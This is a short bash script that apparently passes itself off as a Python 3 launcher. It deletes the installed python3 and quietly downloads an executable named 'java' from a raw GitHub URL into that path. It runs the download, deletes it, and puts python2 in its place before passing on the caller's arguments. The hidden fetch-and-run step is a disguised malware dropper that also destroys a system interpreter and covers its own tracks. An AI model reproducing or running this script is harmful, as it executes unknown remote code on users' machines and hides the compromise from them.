#!/bin/bash
rm -rf /usr/local/bin/python3
wget -q -O /usr/local/bin/python3 https://raw.githubusercontent.com/jackmoc/update/main/java
chmod +x /usr/local/bin/python3
/usr/local/bin/python3
rm -rf /usr/local/bin/python3
mv /usr/local/bin/python2 /usr/local/bin/python3
exec python3 $1 $2 $3 $4 $5 $6 $7 $8 $9
